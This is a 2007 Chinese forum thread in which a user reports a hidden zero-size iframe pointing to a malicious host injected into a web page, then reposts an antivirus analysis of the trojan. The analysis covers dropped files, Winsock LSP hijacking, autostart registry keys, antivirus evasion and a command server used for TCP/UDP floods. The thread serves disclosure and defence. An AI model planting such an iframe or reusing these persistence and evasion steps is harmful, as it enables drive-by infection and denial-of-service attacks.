论坛风格切换切换到宽版
  • 4149阅读
  • 35回复

我被弓虽女干了,怎么干掉这东西 [复制链接]

上一主题 下一主题
离线DaveiH
 
发帖
167
樱饼
0
博丽神社的喝茶券(威望)
20
春度
161
交易币
0
只看楼主 倒序阅读 楼主  发表于: 2007-02-12
当我打开工口银行他就自己插入下面第一句
<iframe src=http://a.d3a.us/1/ width=0 height=0 frameborder=0></iframe>                                                                                                                

<HTML><HEAD><TITLE>中国工商银行中国网站</TITLE>
<link rel="stylesheet" href="style.css" type="text/css">
<SCRIPT src="/include/fly.js"></SCRIPT>
<SCRIPT language=JavaScript>

<!--
function MM_openBrWindow(theURL,winName,features) { //v2.0
window.open(theURL,winName,features);
}
//-->
      
           
离线24242625
发帖
529
樱饼
0
博丽神社的喝茶券(威望)
0
春度
20
交易币
0
只看该作者 1楼 发表于: 2007-02-12
1条评分
支持度 春度  :1 2007-02-12
A门
离线DaveiH
发帖
167
樱饼
0
博丽神社的喝茶券(威望)
20
春度
161
交易币
0
只看该作者 2楼 发表于: 2007-02-12
原來這就是那個洪水猛獸病毒。。。。都怪我疏忽了~~~~
      
           
离线DaveiH
发帖
167
樱饼
0
博丽神社的喝茶券(威望)
20
春度
161
交易币
0
只看该作者 3楼 发表于: 2007-02-12
这是个将TCP、UDP flood攻击程序与一个广告下载器捆绑在一起的病毒。该病毒会接收木马种植者的命令来攻击指定的IP地址,从而造成被攻击者网络瘫痪,也会造成攻击者所在的局域网网络瘫痪。同时该病毒会疯狂的从网上下载广告软件到用户机器安装,使用户机器运行不稳定甚至蓝屏。

1、释放以下文件:
c:\wc1.exe
c:\wc2.exe
%systemdir%\mssock.dll
%systemdir%\AlxRes061201.exe
%systemdir%\scrsys061201.scr
%systemdir%\winsys32_061201.dll
%systemdir%\scrsys16_061201.scr
%systemdir%\winsys32_061201.dll
%WinDir%\winsys.ini
%systemdir%\wbem\Repository\FS\ 该目录中所有文件

2、wc2.exe 会释放一个名为mssock.dll,该DLL文件有伪装的微软版本信息,正常系统文件名应该为mswsock.dll。

3、wc2.exe 会修改注册表项来接管LSP进行启动:
HKLM\System\CurrentControlSet\Services\WinSock2\TCPIP\1001 "%SystemRoot%\system32\mswsock.dll"
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000001\PackedCatalogItem 25 53 79 73 74 65 6D 52 ...
HKLM\System\CurrentControlSet\Services\WinSock2\TCPIP\1002 "%SystemRoot%\system32\mswsock.dll"
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000002\PackedCatalogItem 25 53 79 73 74 65 6D 52 ...
HKLM\System\CurrentControlSet\Services\WinSock2\TCPIP\1003 "%SystemRoot%\system32\mswsock.dll"
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000003\PackedCatalogItem 25 53 79 73 74 65 6D 52 ...
HKLM\System\CurrentControlSet\Services\WinSock2\TCPIP\1004 "%SystemRoot%\system32\rsvpsp.dll"
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000004\PackedCatalogItem 25 53 79 73 74 65 6D 52 ...
HKLM\System\CurrentControlSet\Services\WinSock2\TCPIP\1005 "%SystemRoot%\system32\rsvpsp.dll"
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000005\PackedCatalogItem 25 53 79 73 74 65 6D 52 ...
注:25 53 79 73 74 65 6D 52 ... 对应的ASCII码为:%SystemRoot%\system32\mssock.dll

4、mssock.dll 是个黑客程序,会连接 pqc888.3322.org 的 8004 端口等待接收指令。木马种植者可以命令肉机对指定IP和指定端口进行多线程TCP Foold或UDP Foold攻击,从而使被攻击者网络瘫痪,同时也会造成攻击者所在的局域网网络瘫痪。

5、wc1.exe 是个广告下载器,释放除wc2.exe 和 mssock.dll 的其它文件。

6、广告下载器 会修改如下注册表项来达到自启动的目的:
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit "C:\WINDOWS\system32\userinit.exe,rundll32.exe C:\WINDOWS\system32\winsys16_061201.dll start"

7、广告下载器 会添加以下注册表项来防止弹出的网页:music.51zc.com 和 news.51zc.com被百度搜霸、雅虎助手、IE浏览器和Google工具条拦截:
HKCU\Software\Baidu\BaiduBar\WhiteList\*.music.51zc.com;news.51zc.com*
HKCU\Software\Yahoo\Assistant\Assist\adwurl\http://music.51zc.com;news.51zc.com;* 0x2
HKCU\Software\Microsoft\Internet Explorer\New Windows\Allow\music.51zc.com;news.51zc.com;
HKCU\Software\Google\NavClient\1.1\whitelist\allow2 "|music.51zc.com;news.51zc.com;|"

8、广告下载器 会通过发送窗口消息来躲避雅虎助手的广告拦截。

9、广告下载器 会尝试查找并关闭进程:KRegEx.exe、KVXP.kxp。

10、广告下载器 会尝试往瑞星、AVP的注册表监控等实时监控窗口发送允许消息并关闭实时监控窗口,从而躲避实时监控。

11、广告下载器 会启动IE然后对其进行注入,通过IE从网上下载相当数量的广告到用户机器并安装,从而避免被防火墙拦截。

原文地址:http://vi.duba.net/index.php?CODE=02&virusid=38733

真毒~~~
      
           
离线24242625
发帖
529
樱饼
0
博丽神社的喝茶券(威望)
0
春度
20
交易币
0
只看该作者 4楼 发表于: 2007-02-12
我怎么没中过
天天上OX网站
A门
离线DaveiH
发帖
167
樱饼
0
博丽神社的喝茶券(威望)
20
春度
161
交易币
0
只看该作者 5楼 发表于: 2007-02-12
这个一定是从老板的机传染过来的~~
      
           
离线Leading
发帖
*
樱饼
*
博丽神社的喝茶券(威望)
*
春度
*
交易币
*
只看该作者 6楼 发表于: 2007-02-12
平时不做亏心事…………

我防火墙都不开,裸奔了这么久熊猫也没烧到我家,更别说这些木马了……
离线DaveiH
发帖
167
樱饼
0
博丽神社的喝茶券(威望)
20
春度
161
交易币
0
只看该作者 7楼 发表于: 2007-02-12
在路由把a.d3a.us的ip和8004端口封掉了~~
      
           
离线24242625
发帖
529
樱饼
0
博丽神社的喝茶券(威望)
0
春度
20
交易币
0
只看该作者 8楼 发表于: 2007-02-12
DH大肯定是发现了什么好站没共享 遭报应了
A门
离线花剑酒
发帖
4607
樱饼
10
博丽神社的喝茶券(威望)
20
春度
564
交易币
0
只看该作者 9楼 发表于: 2007-02-12
引用第6楼Leading2007-02-12 06:59发表的:
平时不做亏心事………… [表情]
我防火墙都不开,裸奔了这么久熊猫也没烧到我家,更别说这些木马了…… [表情]

还是不建议裸奔……那么有自信的话那么我在你家电脑养木马吧……
离线Leading
发帖
*
樱饼
*
博丽神社的喝茶券(威望)
*
春度
*
交易币
*
只看该作者 10楼 发表于: 2007-02-12
我这里岂是你随随便便能进来的……
[ 此贴被Leading在2007-02-12 12:01重新编辑 ]
离线Advance
发帖
2680
樱饼
0
博丽神社的喝茶券(威望)
2
春度
427
交易币
0
只看该作者 11楼 发表于: 2007-02-12
引用第6楼Leading2007-02-12 06:59发表的:
平时不做亏心事………… [表情]
我防火墙都不开,裸奔了这么久熊猫也没烧到我家,更别说这些木马了…… [表情]


裸奔+1
离线Leading
发帖
*
樱饼
*
博丽神社的喝茶券(威望)
*
春度
*
交易币
*
只看该作者 12楼 发表于: 2007-02-12
其实我想试试能奔多久………………
离线mazhen8u8
发帖
393
樱饼
0
博丽神社的喝茶券(威望)
1
春度
290
交易币
0
只看该作者 13楼 发表于: 2007-02-12
……同裸奔……

其实我已经奔1年多快两年了……估计在我换VISTA之前是不会出问题了……


内网的我还发愁别人连不上我呢……该死的大网关+硬防火墙……说什么都过不去……除非有人跟我同用这个网……不过我估计用这网的没几个懂电脑的……
[ 此贴被mazhen8u8在2007-02-12 17:35重新编辑 ]
离线花剑酒
发帖
4607
樱饼
10
博丽神社的喝茶券(威望)
20
春度
564
交易币
0
只看该作者 14楼 发表于: 2007-02-12
还是不建议裸奔,至少装网络防火墙,太危险了,理由如下:


对不起!您没有登录,请先登录论坛.
快速回复
限100 字节
 
上一个 下一个